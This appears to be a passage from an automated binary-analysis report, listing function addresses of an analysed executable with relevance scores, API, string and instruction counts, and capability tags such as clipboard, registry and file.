Function 23828158 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23826B78 Relevance: .3, Instructions: 268, Tags: COMMON
Function 238278A8 Relevance: .3, Instructions: 268, Tags: COMMON
Function 238262C8 Relevance: .3, Instructions: 268, Tags: COMMON
Function 238208F0 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23825A18 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23820040 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23827450 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23825E70 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23823360 Relevance: .2, Instructions: 222, Tags: COMMON
Function 0015DE23 Relevance: .2, Instructions: 193, Tags: COMMON
Function 23823350 Relevance: .1, Instructions: 132, Tags: COMMON
Function 0015E005 Relevance: .1, Instructions: 116, Tags: COMMON
Function 00405200 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284, Tags: window, clipboard, memory, COMMON
Function 004037AC Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 216, Tags: string, registry, library, COMMON
Function 004041C4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207, Tags: window, string, COMMON
Function 00405B37 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136, Tags: string, memory, file, COMMON
Function 004044C2 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275, Tags: string, COMMON
Function 00405E3B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207, Tags: string, COMMON
Function 00402FA2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166, Tags: file, COMMON
Function 0040408E Relevance: 12.1, APIs: 8, Instructions: 61, Tags: COMMON
Function 0040498B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48, Tags: window, COMMON
Function 00402C7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40, Tags: time, COMMON
Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54, Tags: file, string, COMMON
Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39, Tags: window, COMMON
Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38, Tags: COMMON
Function 0040487D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84, Tags: string, COMMON
Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76, Tags: window, time, COMMON
Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57, Tags: COMMON
Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55, Tags: memory, COMMON
Function 00402D05 Relevance: 6.0, APIs: 4, Instructions: 33, Tags: COMMON
Function 00405035 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46, Tags: window, COMMON
Function 00405590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24, Tags: process, COMMON
Function 004068A3 Relevance: 5.2, APIs: 4, Instructions: 236, Tags: COMMON
Function 00406AA4 Relevance: 5.2, APIs: 4, Instructions: 208, Tags: COMMON
Function 004067BA Relevance: 5.2, APIs: 4, Instructions: 205, Tags: COMMON
Function 004062BF Relevance: 5.2, APIs: 4, Instructions: 198, Tags: COMMON
Function 0040670D Relevance: 5.2, APIs: 4, Instructions: 180, Tags: COMMON
Function 0040682B Relevance: 5.2, APIs: 4, Instructions: 170, Tags: COMMON
Function 00406777 Relevance: 5.2, APIs: 4, Instructions: 168, Tags: COMMON
Function 001521E3 Relevance: 5.2, Strings: 4, Instructions: 151, Tags: COMMON
Function 00151478 Relevance: 5.1, Strings: 4, Instructions: 62, Tags: COMMON
Function 00156088 Relevance: 5.0, Strings: 4, Instructions: 49, Tags: COMMON
Function 004059EA Relevance: 5.0, APIs: 4, Instructions: 37, Tags: string, COMMON